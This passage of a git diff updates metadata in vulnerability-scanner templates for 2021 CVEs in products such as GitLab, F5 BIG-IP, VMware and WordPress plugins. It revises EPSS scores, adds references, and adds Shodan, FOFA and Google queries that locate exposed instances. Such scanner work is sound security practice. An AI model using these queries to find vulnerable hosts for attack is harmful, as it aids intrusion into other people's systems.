http.html:"r-seenet" + fofa-query: body="r-seenet" tags: cve2021,cve,rseenet,xss,advantech http: diff --git a/http/cves/2021/CVE-2021-21803.yaml b/http/cves/2021/CVE-2021-21803.yaml index 8034853bc2..5a5e7ee01f 100644 --- a/http/cves/2021/CVE-2021-21803.yaml +++ b/http/cves/2021/CVE-2021-21803.yaml @@ -19,13 +19,15 @@ info: cvss-score: 6.1 cve-id: CVE-2021-21803 cwe-id: CWE-79 - epss-score: 0.80604 - epss-percentile: 0.98232 + epss-score: 0.80194 + epss-percentile: 0.98308 cpe: cpe:2.3:a:advantech:r-seenet:2.4.12:*:*:*:*:*:*:* metadata: max-request: 1 vendor: advantech product: r-seenet + shodan-query: http.html:"r-seenet" + fofa-query: body="r-seenet" tags: cve2021,cve,rseenet,xss,advantech http: diff --git a/http/cves/2021/CVE-2021-21805.yaml b/http/cves/2021/CVE-2021-21805.yaml index 3ed6b9fc39..fe9d9b89f1 100644 --- a/http/cves/2021/CVE-2021-21805.yaml +++ b/http/cves/2021/CVE-2021-21805.yaml @@ -30,6 +30,7 @@ info: vendor: advantech product: r-seenet shodan-query: http.html:"R-SeeNet" + fofa-query: body="r-seenet" tags: cve2021,cve,rce,r-seenet,advantech http: diff --git a/http/cves/2021/CVE-2021-21978.yaml b/http/cves/2021/CVE-2021-21978.yaml index dd10fe8e66..81b64d6de3 100644 --- a/http/cves/2021/CVE-2021-21978.yaml +++ b/http/cves/2021/CVE-2021-21978.yaml @@ -23,8 +23,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-21978 cwe-id: CWE-20 - epss-score: 0.97469 - epss-percentile: 0.99959 + epss-score: 0.97475 + epss-percentile: 0.99967 cpe: cpe:2.3:a:vmware:view_planner:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-22005.yaml b/http/cves/2021/CVE-2021-22005.yaml index c55d06d515..e13d41f8d8 100644 --- a/http/cves/2021/CVE-2021-22005.yaml +++ b/http/cves/2021/CVE-2021-22005.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-22005 cwe-id: CWE-22 - epss-score: 0.97389 - epss-percentile: 0.99909 + epss-score: 0.97396 + epss-percentile: 0.99916 cpe: cpe:2.3:a:vmware:cloud_foundation:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-22053.yaml b/http/cves/2021/CVE-2021-22053.yaml index cc98baa4c0..f3f34b8b6b 100644 --- a/http/cves/2021/CVE-2021-22053.yaml +++ b/http/cves/2021/CVE-2021-22053.yaml @@ -21,8 +21,8 @@ info: cvss-score: 8.8 cve-id: CVE-2021-22053 cwe-id: CWE-94 - epss-score: 0.51942 - epss-percentile: 0.97288 + epss-score: 0.54052 + epss-percentile: 0.97624 cpe: cpe:2.3:a:vmware:spring_cloud_netflix:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-22054.yaml b/http/cves/2021/CVE-2021-22054.yaml index e96b40f597..391970c475 100644 --- a/http/cves/2021/CVE-2021-22054.yaml +++ b/http/cves/2021/CVE-2021-22054.yaml @@ -20,8 +20,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-22054 cwe-id: CWE-918 - epss-score: 0.74813 - epss-percentile: 0.98065 + epss-score: 0.7582 + epss-percentile: 0.98174 cpe: cpe:2.3:a:vmware:workspace_one_uem_console:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-22122.yaml b/http/cves/2021/CVE-2021-22122.yaml index 35cf72e9b8..b76ed058ac 100644 --- a/http/cves/2021/CVE-2021-22122.yaml +++ b/http/cves/2021/CVE-2021-22122.yaml @@ -15,13 +15,14 @@ info: - https://twitter.com/ptswarm/status/1357316793753362433 - https://fortiguard.com/advisory/FG-IR-20-122 - https://nvd.nist.gov/vuln/detail/CVE-2021-22122 + - https://github.com/Elsfa7-110/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-22122 cwe-id: CWE-79 - epss-score: 0.00609 - epss-percentile: 0.76286 + epss-score: 0.0548 + epss-percentile: 0.93181 cpe: cpe:2.3:a:fortinet:fortiweb:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-22145.yaml b/http/cves/2021/CVE-2021-22145.yaml index a5f6c0d641..c89c8a3799 100644 --- a/http/cves/2021/CVE-2021-22145.yaml +++ b/http/cves/2021/CVE-2021-22145.yaml @@ -20,13 +20,14 @@ info: cvss-score: 6.5 cve-id: CVE-2021-22145 cwe-id: CWE-209 - epss-score: 0.96279 - epss-percentile: 0.99499 + epss-score: 0.96444 + epss-percentile: 0.99578 cpe: cpe:2.3:a:elastic:elasticsearch:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: elastic product: elasticsearch + fofa-query: index_not_found_exception tags: cve2021,cve,elasticsearch,packetstorm,elastic http: diff --git a/http/cves/2021/CVE-2021-22205.yaml b/http/cves/2021/CVE-2021-22205.yaml index 9909ce0fba..d81fa9d992 100644 --- a/http/cves/2021/CVE-2021-22205.yaml +++ b/http/cves/2021/CVE-2021-22205.yaml @@ -30,6 +30,8 @@ info: vendor: gitlab product: gitlab shodan-query: http.title:"GitLab" + fofa-query: title="gitlab" + google-query: intitle:"gitlab" tags: cve2021,cve,kev,hackerone,gitlab,rce http: diff --git a/http/cves/2021/CVE-2021-22214.yaml b/http/cves/2021/CVE-2021-22214.yaml index 3cc37d0baf..84be035b41 100644 --- a/http/cves/2021/CVE-2021-22214.yaml +++ b/http/cves/2021/CVE-2021-22214.yaml @@ -25,13 +25,15 @@ info: cve-id: CVE-2021-22214 cwe-id: CWE-918 epss-score: 0.09317 - epss-percentile: 0.94551 + epss-percentile: 0.94683 cpe: cpe:2.3:a:gitlab:gitlab:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: gitlab product: gitlab shodan-query: http.title:"GitLab" + fofa-query: title="gitlab" + google-query: intitle:"gitlab" tags: cve2021,cve,gitlab,ssrf http: diff --git a/http/cves/2021/CVE-2021-22707.yaml b/http/cves/2021/CVE-2021-22707.yaml index 843d4a9253..991de64f34 100644 --- a/http/cves/2021/CVE-2021-22707.yaml +++ b/http/cves/2021/CVE-2021-22707.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-22707 cwe-id: CWE-798 - epss-score: 0.27092 - epss-percentile: 0.96671 + epss-score: 0.39995 + epss-percentile: 0.97263 cpe: cpe:2.3:o:schneider-electric:evlink_city_evc1s22p4_firmware:*:*:*:*:*:*:*:* metadata: verified: true @@ -27,6 +27,7 @@ info: product: evlink_city_evc1s22p4_firmware shodan-query: title:"EVSE web interface" fofa-query: title="EVSE web interface" + google-query: intitle:"evse web interface" tags: cve2021,cve,evlink,auth-bypass,schneider-electric http: diff --git a/http/cves/2021/CVE-2021-22873.yaml b/http/cves/2021/CVE-2021-22873.yaml index b6c9e3bdca..592773fda4 100644 --- a/http/cves/2021/CVE-2021-22873.yaml +++ b/http/cves/2021/CVE-2021-22873.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-22873 cwe-id: CWE-601 epss-score: 0.00922 - epss-percentile: 0.82556 + epss-percentile: 0.82899 cpe: cpe:2.3:a:revive-adserver:revive_adserver:*:*:*:*:*:*:*:* metadata: verified: true @@ -29,6 +29,8 @@ info: vendor: revive-adserver product: revive_adserver shodan-query: http.favicon.hash:106844876 + fofa-query: icon_hash=106844876 + google-query: intitle:"revive adserver" tags: cve2021,cve,hackerone,seclists,packetstorm,redirect,revive,revive-adserver http: diff --git a/http/cves/2021/CVE-2021-22911.yaml b/http/cves/2021/CVE-2021-22911.yaml index 8ae52aa88f..2946efdf9c 100644 --- a/http/cves/2021/CVE-2021-22911.yaml +++ b/http/cves/2021/CVE-2021-22911.yaml @@ -30,6 +30,8 @@ info: vendor: rocket.chat product: rocket.chat shodan-query: http.title:"Rocket.Chat" + fofa-query: title="rocket.chat" + google-query: intitle:"rocket.chat" tags: cve2021,cve,rocketchat,nosqli,packetstorm,vulhub,hackerone,rocket.chat,sqli http: diff --git a/http/cves/2021/CVE-2021-22986.yaml b/http/cves/2021/CVE-2021-22986.yaml index 8cbe38d410..3156921190 100644 --- a/http/cves/2021/CVE-2021-22986.yaml +++ b/http/cves/2021/CVE-2021-22986.yaml @@ -27,6 +27,9 @@ info: max-request: 2 vendor: f5 product: big-ip_access_policy_manager + shodan-query: http.title:"big-ip®-+redirect" +"server" + fofa-query: title="big-ip®-+redirect" +"server" + google-query: intitle:"big-ip®-+redirect" +"server" tags: cve,cve2021,bigip,rce,kev,packetstorm,f5 http: diff --git a/http/cves/2021/CVE-2021-24145.yaml b/http/cves/2021/CVE-2021-24145.yaml index faae9c575d..686929fe9e 100644 --- a/http/cves/2021/CVE-2021-24145.yaml +++ b/http/cves/2021/CVE-2021-24145.yaml @@ -14,13 +14,14 @@ info: - https://downloads.wordpress.org/plugin/modern-events-calendar-lite.5.15.5.zip - https://github.com/dnr6419/CVE-2021-24145 - https://nvd.nist.gov/vuln/detail/CVE-2021-24145 + - https://github.com/k0mi-tg/CVE-POC classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.2 cve-id: CVE-2021-24145 cwe-id: CWE-434 - epss-score: 0.94936 - epss-percentile: 0.99118 + epss-score: 0.96351 + epss-percentile: 0.99553 cpe: cpe:2.3:a:webnus:modern_events_calendar_lite:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -29,7 +30,6 @@ info: product: modern_events_calendar_lite framework: wordpress tags: cve,cve2021,auth,wpscan,wordpress,wp-plugin,wp,modern-events-calendar-lite,rce,intrusive,webnus - variables: string: "CVE-2021-24145" diff --git a/http/cves/2021/CVE-2021-24165.yaml b/http/cves/2021/CVE-2021-24165.yaml index cffac4b43f..f94ba1a63c 100644 --- a/http/cves/2021/CVE-2021-24165.yaml +++ b/http/cves/2021/CVE-2021-24165.yaml @@ -29,6 +29,9 @@ info: vendor: ninjaforms product: ninja_forms framework: wordpress + publicwww-query: /wp-content/plugins/ninja-forms/ + shodan-query: http.html:/wp-content/plugins/ninja-forms/ + fofa-query: body=/wp-content/plugins/ninja-forms/ tags: cve2021,cve,wordpress,redirect,wp-plugin,authenticated,wp,wpscan,ninjaforms http: diff --git a/http/cves/2021/CVE-2021-24169.yaml b/http/cves/2021/CVE-2021-24169.yaml index c9b9181338..b4634e5e00 100644 --- a/http/cves/2021/CVE-2021-24169.yaml +++ b/http/cves/2021/CVE-2021-24169.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-24169 cwe-id: CWE-79 epss-score: 0.0021 - epss-percentile: 0.58287 + epss-percentile: 0.5893 cpe: cpe:2.3:a:algolplus:advanced_order_export:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24214.yaml b/http/cves/2021/CVE-2021-24214.yaml index 4595b089bc..539210ccab 100644 --- a/http/cves/2021/CVE-2021-24214.yaml +++ b/http/cves/2021/CVE-2021-24214.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-24214 cwe-id: CWE-79 epss-score: 0.00337 - epss-percentile: 0.7074 + epss-percentile: 0.71271 cpe: cpe:2.3:a:daggerhartlab:openid_connect_generic_client:3.8.0:*:*:*:*:wordpress:*:* metadata: verified: true @@ -30,7 +30,6 @@ info: product: openid_connect_generic_client framework: wordpress tags: cve2021,cve,wpscan,wordpress,xss,wp-plugin,wp,openid,daggerhartlab - flow: http(1) && http(2) http: diff --git a/http/cves/2021/CVE-2021-24215.yaml b/http/cves/2021/CVE-2021-24215.yaml index 663bb6f686..6823dc6620 100644 --- a/http/cves/2021/CVE-2021-24215.yaml +++ b/http/cves/2021/CVE-2021-24215.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-24215 cwe-id: CWE-425,CWE-284 - epss-score: 0.19113 - epss-percentile: 0.9615 + epss-score: 0.30288 + epss-percentile: 0.96943 cpe: cpe:2.3:a:wpruby:controlled_admin_access:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -28,6 +28,8 @@ info: product: controlled_admin_access framework: wordpress publicwww-query: /wp-content/plugins/controlled-admin-access/ + shodan-query: http.html:/wp-content/plugins/controlled-admin-access/ + fofa-query: body=/wp-content/plugins/controlled-admin-access/ tags: cve2021,cve,authenticated,wpscan,wordpress,wp-plugin,wp,controlled-admin-access,wpruby http: diff --git a/http/cves/2021/CVE-2021-24227.yaml b/http/cves/2021/CVE-2021-24227.yaml index 547d54e72c..097ff33b6d 100644 --- a/http/cves/2021/CVE-2021-24227.yaml +++ b/http/cves/2021/CVE-2021-24227.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-24227 cwe-id: CWE-200 epss-score: 0.02607 - epss-percentile: 0.9006 + epss-percentile: 0.90292 cpe: cpe:2.3:a:patreon:patreon_wordpress:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24235.yaml b/http/cves/2021/CVE-2021-24235.yaml index 6c47e5e801..7e97211902 100644 --- a/http/cves/2021/CVE-2021-24235.yaml +++ b/http/cves/2021/CVE-2021-24235.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-24235 cwe-id: CWE-79 epss-score: 0.00119 - epss-percentile: 0.45944 + epss-percentile: 0.46103 cpe: cpe:2.3:a:boostifythemes:goto:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24237.yaml b/http/cves/2021/CVE-2021-24237.yaml index 21a538f9ff..c0e7dbf23a 100644 --- a/http/cves/2021/CVE-2021-24237.yaml +++ b/http/cves/2021/CVE-2021-24237.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-24237 cwe-id: CWE-79 epss-score: 0.00265 - epss-percentile: 0.65501 + epss-percentile: 0.66138 cpe: cpe:2.3:a:purethemes:findeo:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24239.yaml b/http/cves/2021/CVE-2021-24239.yaml index ffb9928f4c..ead9379a4d 100644 --- a/http/cves/2021/CVE-2021-24239.yaml +++ b/http/cves/2021/CVE-2021-24239.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-24239 cwe-id: CWE-79 epss-score: 0.00129 - epss-percentile: 0.47461 + epss-percentile: 0.47703 cpe: cpe:2.3:a:genetechsolutions:pie_register:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -28,7 +28,6 @@ info: product: pie_register framework: wordpress tags: cve2021,cve,xss,pie-register,wp,wpscan,genetechsolutions,wordpress - flow: http(1) && http(2) http: diff --git a/http/cves/2021/CVE-2021-24275.yaml b/http/cves/2021/CVE-2021-24275.yaml index b1ce96f7aa..490c15abcd 100644 --- a/http/cves/2021/CVE-2021-24275.yaml +++ b/http/cves/2021/CVE-2021-24275.yaml @@ -28,6 +28,9 @@ info: vendor: supsystic product: popup framework: wordpress + publicwww-query: /wp-content/plugins/popup-by-supsystic + shodan-query: http.html:/wp-content/plugins/popup-by-supsystic + fofa-query: body=/wp-content/plugins/popup-by-supsystic tags: cve2021,cve,wpscan,packetstorm,wordpress,wp-plugin,supsystic http: diff --git a/http/cves/2021/CVE-2021-24276.yaml b/http/cves/2021/CVE-2021-24276.yaml index e1212fa058..008efe6cda 100644 --- a/http/cves/2021/CVE-2021-24276.yaml +++ b/http/cves/2021/CVE-2021-24276.yaml @@ -21,13 +21,16 @@ info: cve-id: CVE-2021-24276 cwe-id: CWE-79 epss-score: 0.00231 - epss-percentile: 0.60494 + epss-percentile: 0.61154 cpe: cpe:2.3:a:supsystic:contact_form:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 vendor: supsystic product: contact_form framework: wordpress + publicwww-query: /wp-content/plugins/contact-form-plugin/ + shodan-query: http.html:/wp-content/plugins/contact-form-plugin/ + fofa-query: body=/wp-content/plugins/contact-form-plugin/ tags: cve2021,cve,wordpress,wp-plugin,wpscan,packetstorm,supsystic http: diff --git a/http/cves/2021/CVE-2021-24278.yaml b/http/cves/2021/CVE-2021-24278.yaml index 25ceab1fe5..24c2b6839f 100644 --- a/http/cves/2021/CVE-2021-24278.yaml +++ b/http/cves/2021/CVE-2021-24278.yaml @@ -20,8 +20,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-24278 cwe-id: CWE-863 - epss-score: 0.05506 - epss-percentile: 0.93039 + epss-score: 0.05157 + epss-percentile: 0.92966 cpe: cpe:2.3:a:querysol:redirection_for_contact_form_7:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24285.yaml b/http/cves/2021/CVE-2021-24285.yaml index ae2c5774ce..316e6675b6 100644 --- a/http/cves/2021/CVE-2021-24285.yaml +++ b/http/cves/2021/CVE-2021-24285.yaml @@ -13,13 +13,15 @@ info: - https://codevigilant.com/disclosure/2021/wp-plugin-cars-seller-auto-classifieds-script-sql-injection/ - https://wpscan.com/vulnerability/f35d6ab7-dd52-48b3-a79c-3f89edf24162 - https://codevigilant.com/disclosure/2021/24-04-2021-wp-plugin-cars-seller-auto-classifieds-script-sql-injection/ + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/SexyBeast233/SecBooks classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-24285 cwe-id: CWE-89 - epss-score: 0.21023 - epss-percentile: 0.95973 + epss-score: 0.11694 + epss-percentile: 0.95278 cpe: cpe:2.3:a:cars-seller-auto-classifieds-script_project:cars-seller-auto-classifieds-script:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24286.yaml b/http/cves/2021/CVE-2021-24286.yaml index 88ac97423a..f42407ae19 100644 --- a/http/cves/2021/CVE-2021-24286.yaml +++ b/http/cves/2021/CVE-2021-24286.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-24286 cwe-id: CWE-79 epss-score: 0.00231 - epss-percentile: 0.60494 + epss-percentile: 0.61154 cpe: cpe:2.3:a:mooveagency:redirect_404_to_parent:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24287.yaml b/http/cves/2021/CVE-2021-24287.yaml index 74cc20d62f..e7c9fbea8e 100644 --- a/http/cves/2021/CVE-2021-24287.yaml +++ b/http/cves/2021/CVE-2021-24287.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-24287 cwe-id: CWE-79 epss-score: 0.00231 - epss-percentile: 0.60494 + epss-percentile: 0.61154 cpe: cpe:2.3:a:mooveagency:select_all_categories_and_taxonomies\,_change_checkbox_to_radio_buttons:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24288.yaml b/http/cves/2021/CVE-2021-24288.yaml index 5c4fd0d54d..0ec9ba6c6a 100644 --- a/http/cves/2021/CVE-2021-24288.yaml +++ b/http/cves/2021/CVE-2021-24288.yaml @@ -12,13 +12,15 @@ info: reference: - https://wpscan.com/vulnerability/56628862-1687-4862-9ed4-145d8dfbca97 - https://nvd.nist.gov/vuln/detail/CVE-2021-24288 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-24288 cwe-id: CWE-601 - epss-score: 0.00129 - epss-percentile: 0.47456 + epss-score: 0.00137 + epss-percentile: 0.49121 cpe: cpe:2.3:a:acymailing:acymailing:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24291.yaml b/http/cves/2021/CVE-2021-24291.yaml index ce684b06b9..3d9a76faf9 100644 --- a/http/cves/2021/CVE-2021-24291.yaml +++ b/http/cves/2021/CVE-2021-24291.yaml @@ -27,6 +27,9 @@ info: vendor: 10web product: photo_gallery framework: wordpress + publicwww-query: /wp-content/plugins/photo-gallery + shodan-query: http.html:/wp-content/plugins/photo-gallery + fofa-query: body=/wp-content/plugins/photo-gallery tags: cve2021,cve,photo,wpscan,packetstorm,xss,wordpress,wp-plugin,10web http: diff --git a/http/cves/2021/CVE-2021-24316.yaml b/http/cves/2021/CVE-2021-24316.yaml index 0acdffde58..ae31119e67 100644 --- a/http/cves/2021/CVE-2021-24316.yaml +++ b/http/cves/2021/CVE-2021-24316.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-24316 cwe-id: CWE-79 epss-score: 0.00317 - epss-percentile: 0.69851 + epss-percentile: 0.70371 cpe: cpe:2.3:a:wowthemes:mediumish:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24320.yaml b/http/cves/2021/CVE-2021-24320.yaml index 931e5c7568..da9d500fb7 100644 --- a/http/cves/2021/CVE-2021-24320.yaml +++ b/http/cves/2021/CVE-2021-24320.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.1 cve-id: CVE-2021-24320 cwe-id: CWE-79 - epss-score: 0.00116 - epss-percentile: 0.45256 + epss-score: 0.00123 + epss-percentile: 0.46682 cpe: cpe:2.3:a:bold-themes:bello:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -29,7 +29,6 @@ info: product: bello framework: wordpress tags: cve2021,cve,wordpress,xss,wp-plugin,wpscan,bold-themes - flow: http(1) && http(2) http: diff --git a/http/cves/2021/CVE-2021-24340.yaml b/http/cves/2021/CVE-2021-24340.yaml index 8a3bc70e9e..246f436182 100644 --- a/http/cves/2021/CVE-2021-24340.yaml +++ b/http/cves/2021/CVE-2021-24340.yaml @@ -18,14 +18,18 @@ info: cvss-score: 7.5 cve-id: CVE-2021-24340 cwe-id: CWE-89 - epss-score: 0.01937 - epss-percentile: 0.88371 + epss-score: 0.01606 + epss-percentile: 0.8741 cpe: cpe:2.3:a:veronalabs:wp_statistics:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 vendor: veronalabs product: wp_statistics framework: wordpress + google-query: inurl:/wp-content/plugins/wp-statistics + publicwww-query: /wp-content/plugins/wp-statistics/ + shodan-query: http.html:/wp-content/plugins/wp-statistics/ + fofa-query: body=/wp-content/plugins/wp-statistics/ tags: cve2021,cve,wp-plugin,unauth,wpscan,wordpress,sqli,blind,edb,veronalabs http: diff --git a/http/cves/2021/CVE-2021-24347.yaml b/http/cves/2021/CVE-2021-24347.yaml index 4177f7e372..6b88d58a1d 100644 --- a/http/cves/2021/CVE-2021-24347.yaml +++ b/http/cves/2021/CVE-2021-24347.yaml @@ -14,13 +14,14 @@ info: - https://wordpress.org/plugins/sp-client-document-manager/ - https://nvd.nist.gov/vuln/detail/CVE-2021-24347 - http://packetstormsecurity.com/files/163434/WordPress-SP-Project-And-Document-Manager-4.21-Shell-Upload.html + - https://github.com/Hacker5preme/Exploits classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2021-24347 cwe-id: CWE-178 - epss-score: 0.97036 - epss-percentile: 0.99699 + epss-score: 0.96895 + epss-percentile: 0.99708 cpe: cpe:2.3:a:smartypantsplugins:sp_project_\&_document_manager:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24351.yaml b/http/cves/2021/CVE-2021-24351.yaml index 6406ee8919..e4fea31b66 100644 --- a/http/cves/2021/CVE-2021-24351.yaml +++ b/http/cves/2021/CVE-2021-24351.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2021-24351 cwe-id: CWE-79 epss-score: 0.00154 - epss-percentile: 0.50743 + epss-percentile: 0.51646 cpe: cpe:2.3:a:posimyth:the_plus_addons_for_elementor:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24358.yaml b/http/cves/2021/CVE-2021-24358.yaml index 0a3d7635fd..c0a2c61d5f 100644 --- a/http/cves/2021/CVE-2021-24358.yaml +++ b/http/cves/2021/CVE-2021-24358.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-24358 cwe-id: CWE-601 epss-score: 0.00329 - epss-percentile: 0.70388 + epss-percentile: 0.70913 cpe: cpe:2.3:a:posimyth:the_plus_addons_for_elementor:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-24409.yaml b/http/cves/2021/CVE-2021-24409.yaml index f91d354aeb..ce95bef48b 100644 --- a/http/cves/2021/CVE-2021-24409.yaml +++ b/http/cves/2021/CVE-2021-24409.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.1 cve-id: CVE-2021-24409 cwe-id: CWE-79 - epss-score: 0.00161 - epss-percentile: 0.51755 + epss-score: 0.00171 + epss-percentile: 0.54048 cpe: cpe:2.3:a:plugin-planet:prismatic:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -27,6 +27,8 @@ info: product: prismatic framework: wordpress publicwww-query: "/wp-content/plugins/prismatic" + shodan-query: http.html:/wp-content/plugins/prismatic + fofa-query: body=/wp-content/plugins/prismatic tags: cve2021,cve,wpscan,wordpress,wp,wp-plugin,xss,prismatic,authenticated,plugin-planet http: diff --git a/http/cves/2021/CVE-2021-24435.yaml b/http/cves/2021/CVE-2021-24435.yaml index e8d4e6ca7e..f224704d68 100644 --- a/http/cves/2021/CVE-2021-24435.yaml +++ b/http/cves/2021/CVE-2021-24435.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.1 cve-id: CVE-2021-24435 cwe-id: CWE-79 - epss-score: 0.0014 - epss-percentile: 0.4866 + epss-score: 0.00172 + epss-percentile: 0.54295 cpe: cpe:2.3:a:gambit:titan_framework:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24442.yaml b/http/cves/2021/CVE-2021-24442.yaml index b27503e1ae..56fe01869c 100644 --- a/http/cves/2021/CVE-2021-24442.yaml +++ b/http/cves/2021/CVE-2021-24442.yaml @@ -16,8 +16,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-24442 cwe-id: CWE-89 - epss-score: 0.00212 - epss-percentile: 0.58237 + epss-score: 0.1114 + epss-percentile: 0.95154 cpe: cpe:2.3:a:wpdevart:poll\,_survey\,_questionnaire_and_voting_system:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,6 +26,8 @@ info: product: poll\,_survey\,_questionnaire_and_voting_system framework: wordpress publicwww-query: "/wp-content/plugins/polls-widget/" + shodan-query: http.html:/wp-content/plugins/polls-widget/ + fofa-query: body=/wp-content/plugins/polls-widget/ tags: wpscan,cve,cve2021,wp,wp-plugin,wordpress,polls-widget,sqli http: diff --git a/http/cves/2021/CVE-2021-24472.yaml b/http/cves/2021/CVE-2021-24472.yaml index 8745bb19f8..656326e427 100644 --- a/http/cves/2021/CVE-2021-24472.yaml +++ b/http/cves/2021/CVE-2021-24472.yaml @@ -30,6 +30,8 @@ info: product: kentharadio framework: wordpress publicwww-query: "/wp-content/plugins/qt-kentharadio" + shodan-query: http.html:/wp-content/plugins/qt-kentharadio + fofa-query: body=/wp-content/plugins/qt-kentharadio tags: cve2021,cve,wordpress,lfi,ssrf,wp,wp-plugin,wpscan,qantumthemes http: diff --git a/http/cves/2021/CVE-2021-24495.yaml b/http/cves/2021/CVE-2021-24495.yaml index 576143e213..4369c05bbc 100644 --- a/http/cves/2021/CVE-2021-24495.yaml +++ b/http/cves/2021/CVE-2021-24495.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.1 cve-id: CVE-2021-24495 cwe-id: CWE-79 - epss-score: 0.00116 - epss-percentile: 0.44405 + epss-score: 0.00123 + epss-percentile: 0.46682 cpe: cpe:2.3:a:marmoset:marmoset_viewer:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-24498.yaml b/http/cves/2021/CVE-2021-24498.yaml index 0741c6bf0c..1b955e4576 100644 --- a/http/cves/2021/CVE-2021-24498.yaml +++ b/http/cves/2021/CVE-2021-24498.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2021-24498 cwe-id: CWE-79 - epss-score: 0.00161 - epss-percentile: 0.51755 + epss-score: 0.00171 + epss-percentile: 0.54048 cpe: cpe:2.3:a:dwbooster:calendar_event_multi_view:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24510.yaml b/http/cves/2021/CVE-2021-24510.yaml index bb4e6305f1..5eddc3de2b 100644 --- a/http/cves/2021/CVE-2021-24510.yaml +++ b/http/cves/2021/CVE-2021-24510.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2021-24510 cwe-id: CWE-79 - epss-score: 0.00143 - epss-percentile: 0.50097 + epss-score: 0.00119 + epss-percentile: 0.46132 cpe: cpe:2.3:a:mf_gig_calendar_project:mf_gig_calendar:*:*:*:*:wordpress:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-24554.yaml b/http/cves/2021/CVE-2021-24554.yaml index eb76bcf50c..aae98ac483 100644 --- a/http/cves/2021/CVE-2021-24554.yaml +++ b/http/cves/2021/CVE-2021-24554.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.2 cve-id: CVE-2021-24554 cwe-id: CWE-89 - epss-score: 0.20268 - epss-percentile: 0.95935 + epss-score: 0.3323 + epss-percentile: 0.97049 cpe: 